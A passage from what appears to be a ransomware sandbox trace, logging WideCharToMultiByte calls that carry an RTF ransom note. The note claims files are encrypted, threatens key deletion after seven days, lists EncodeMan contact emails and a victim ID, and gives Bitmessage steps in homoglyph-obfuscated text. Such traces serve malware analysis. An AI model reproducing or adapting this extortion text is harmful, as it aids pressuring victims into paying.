reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 